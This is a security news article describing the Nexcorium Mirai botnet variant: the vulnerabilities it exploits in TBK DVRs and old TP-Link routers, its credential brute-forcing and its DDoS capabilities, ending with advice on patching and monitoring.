A newly identified variant of the Mirai botnet, named Nexcorium, is actively exploiting vulnerabilities in Internet of Things (IoT) devices to build large-scale distributed denial-of-service (DDoS) attack networks. Security researchers have observed threat actors targeting TBK digital video recorder devices and outdated TP-Link routers, highlighting the continued risks posed by unpatched and end-of-life hardware.
The campaign primarily leverages CVE-2024-3721, a command injection vulnerability affecting TBK DVR-4104 and DVR-4216 models, which carries a CVSS score of 6.3. By exploiting this flaw, attackers can gain unauthorized access to devices and execute malicious code remotely. This vulnerability has previously been abused in other botnet campaigns, demonstrating its persistent appeal among cybercriminal groups.
Once access is gained, attackers deploy a downloader script that installs the Nexcorium malware, a multi-architecture Mirai-based variant capable of running on different Linux systems. The malware displays a message indicating system takeover and establishes control over the compromised device. Its architecture includes key components such as watchdog, scanner, and attack modules, enabling it to maintain persistence and execute commands from a remote command-and-control server.
In addition to exploiting CVE-2024-3721, Nexcorium incorporates older vulnerabilities like CVE-2017-17215 to expand its infection reach. The malware also uses brute-force techniques with a built-in list of default credentials to compromise additional devices, allowing it to rapidly scale its botnet across vulnerable networks. These combined techniques make it highly effective in spreading across poorly secured IoT environments.
Once enough devices are infected, Nexcorium enables attackers to launch a variety of DDoS attacks, including UDP and TCP floods, targeting websites, services, and infrastructure. The malware connects to centralized servers to receive attack instructions, demonstrating a coordinated approach to large-scale cyberattacks. Experts warn that the campaign underscores the growing threat posed by IoT botnets and the urgent need for timely patching, secure configurations, and proactive monitoring to mitigate such risks.
...){kind=link}